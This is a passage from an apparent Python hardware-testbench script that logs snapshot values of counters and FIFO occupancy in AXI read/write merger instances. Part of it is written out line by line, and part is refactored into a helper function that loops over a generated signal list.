logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.int_count"))
# The per-merger snapshot repeats the same 54 signals for every instance,
# so walk a generated signal list instead of one hand-written line per peek.
# Output is unchanged: "SNP <hex value> <full signal path>" per signal, in
# the same order as before.
def _snapshot_axi_merger(inst):
    """Log every counter/FIFO occupancy signal of one 4-way AXI merger."""
    rd = "tb.dut.%s.axi_rd_4_merger." % inst
    wr = "tb.dut.%s.axi_wr_4_merger." % inst
    sigs = [rd + "%s_rcount" % ch for ch in "abcd"]
    for ch in "abcd":
        sigs += [rd + ch + "_ar_fifo.count",
                 rd + ch + "_ar_fifo.int_count",
                 rd + ch + "_ids_fifo.next_count",
                 rd + ch + "_ids_fifo.count"]
    sigs += [wr + "panic_%scount" % ch for ch in "abcd"]
    sigs += [wr + "%s_bcount" % ch for ch in "abcd"]
    for ch in "abcd":
        sigs += [wr + ch + "_aw_fifo.count",
                 wr + ch + "_aw_fifo.int_count",
                 wr + ch + "_b_fifo.next_count",
                 wr + ch + "_b_fifo.count"]
        if ch == "b":
            # Only channel b has an out FIFO in the write merger.
            sigs += [wr + "b_out_fifo.next_count",
                     wr + "b_out_fifo.count"]
        sigs += [wr + ch + "_win_fifo.count",
                 wr + ch + "_win_fifo.int_count"]
    for sig in sigs:
        logs.log_info("SNP %x %s" % (logs.peek(sig), sig))

for inst in ("merge200", "merge201", "merge202", "merge203"):
    _snapshot_axi_merger(inst)
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.count"))
